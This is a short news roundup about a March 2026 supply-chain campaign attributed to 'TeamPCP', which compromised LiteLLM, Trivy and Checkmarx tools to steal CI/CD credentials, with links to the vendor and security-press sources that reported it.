AI supply‑chain attack
A sophisticated supply‑chain attack compromised LiteLLM, Trivy and Checkmarx in March 2026 and was used to steal CI/CD secrets and poison downstream AI systems — showing attackers can weaponize security tools to breach model pipelines. The incident is being framed as proof that AI infrastructure is now critical infrastructure, demanding continuous dependency validation and new defenses for non‑human identities and agentic systems. (blog.dreamfactory.com)
Security researchers attribute the campaign to the threat actor calling itself “TeamPCP,” which carried out a four‑wave supply‑chain campaign between March 19–24, 2026. (labs.cloudsecurityalliance.org) Aqua’s Trivy ecosystem was abused via compromises to trivy‑action, setup‑trivy and a v0.69.4 release, with malicious artifacts later appearing as Docker images tied to the same campaign. (wiz.io) LiteLLM versions 1.82.7 and 1.82.8 were published to PyPI on March 24, 2026 containing a.pth credential‑stealer, and those poisoned releases were publicly available for roughly five hours before removal. (kaspersky.co.uk) Checkmarx’s tooling was hit as well: researchers reported tampering of the KICS code scanner and OpenVSX/VS Code extensions including cx‑dev‑assist 1.7.0, broadening the pipeline attack surface. (darkreading.com) Analysts tied the malicious LiteLLM artifacts and Trivy compromises to exfiltration of CI/CD credentials and service‑account tokens that enabled Kubernetes‑wide persistence and lateral movement in some environments. (thehackernews.com) Microsoft published a detailed detection, investigation and remediation guide on March 24, 2026, while LiteLLM and multiple security vendors have published incident notices and IoCs to support hunts and rollbacks. (microsoft.com)
